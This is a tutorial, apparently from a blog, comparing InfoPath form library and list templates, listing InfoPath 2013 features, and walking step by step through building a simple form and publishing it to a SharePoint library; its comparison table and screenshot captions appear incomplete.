You basically have two options when you select an InfoPath form template to use in SharePoint applications. As was the case since InfoPath was introduced in 2003, you can design a form that is hosted in a SharePoint form library. You can publish such a form template directly to a form library or as a site content type, which lets multiple libraries within the site refer to the form. New to InfoPath 2010 is the SharePoint list form template. You can configure the default form template for any existing custom SharePoint list, or you can create a SharePoint list directly from the InfoPath designer. SharePoint list form templates use a subset of the features that are available in form library templates, but require fewer configurations with regard to deployment.
Whether to use a SharePoint form library or a list is an important architectural decision that is based on answers to some key questions. Table 3 offers a quick comparison between the two template types based on these key questions, whereas the rest of this section provides more detail with regard to differences.
Table 3. Comparing form library and list templates
Form Library Template
List Template
What is the structure of the form data?
How is form data stored?
XML files
List items
Is there support for custom code?
What offline client is available?
InfoPath filler
SharePoint Workspace
Is there support for digital signatures?

InfoPath Forms 2013


InfoPath is designed to make it easy to build rich forms-based applications on the Microsoft SharePoint Server platform. Microsoft InfoPath 2013 in conjunction with Microsoft SharePoint Server 2013 and InfoPath Forms Services has many features for developers. InfoPath Forms Services, which is available in SharePoint Server 2013, enables you to deploy an InfoPath form template to a SharePoint Server so that users without the InfoPath rich client can open and fill out InfoPath forms in a Web browser.

New Features

  • SharePoint Sandboxed Solutions
  • Publish Forms with One Click
  • Enhance SharePoint List Forms
  • Host Forms on Portal Pages using the InfoPath Form Web Part
  • Richer Web Forms
  • Standards Compliant Browser Forms

New Controls

The feature gap between client and browser forms has been narrowed, creating a more consistent form filling experience for all users. Controls and functionality that are now supported in browser forms include the following:
  • Bulleted, numbered, and plain lists
  • Multiple selection list boxes
  • Combo boxes
  • Picture buttons
  • Hyperlink capabilities
  • Choice group and section
  • Date and time controls
  • Person/group pickers
  • Filtering functionality

Write and Edit Code using Visual Studio

The Microsoft Visual Studio Tools for Applications IDE that was integrated with InfoPath 2010 has been removed in InfoPath 2013. To write or edit form code in InfoPath 2013 now requires Visual Studio 2012 with the Microsoft Visual Studio Tools for Applications 2012 add-on installed. The programming experience itself has not fundamentally changed, but you can now use the full Visual Studio development experience when writing managed code for your InfoPath forms.

Create a simple InfoPath form

Open the InfoPath Designer:

Double click the SharePointFormLibrary:

After that, we need to create a group:

Enter the name of the group and select the Type as ‘Group’:

Here we are entering some fields in that group:

Select the field’s data type:

We entered four more fields:

Drag and drop all the fields to the form tables:

Create a repeatable table:
Here we are creating “EducationalInfo ”as Repeating Table:

Now the form shows like:

Publishing the InfoPath form to the SharePoint Library:

Before publishing the form, we need to save that from:

After saving the form publishing wizard will open and here we need to enter the site URL:

Here, we uncheck the option “Enable this form to be filled out by using a browser” (This part I will explain later in Part 2):

Here we are creating a new library:

Enter the name of the new Library:

Here we need to select group:

Inside the group, we need to select the fields:

Now it’s verifying the form information and then click publish:

The form published successfully:

Refresh the site and add new document:

Now the InfoPath forms open and we can insert some values:

In the repeatable table, we have some option which is shown in the figure:

Click on the save button its values directly saving in the SharePoint Library:

Refresh the site and it shows the data:


In Part 1 of this article, we have explored how to create a simple InfoPath forms and how to publish into SharePoint site.